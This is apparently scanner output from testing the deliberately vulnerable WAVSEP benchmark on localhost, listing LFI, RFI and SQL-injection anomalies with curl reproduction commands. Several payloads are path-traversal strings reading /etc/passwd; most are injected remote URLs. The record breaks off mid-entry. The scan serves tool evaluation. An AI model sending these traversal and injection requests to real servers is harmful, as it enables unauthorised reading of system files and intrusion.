curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
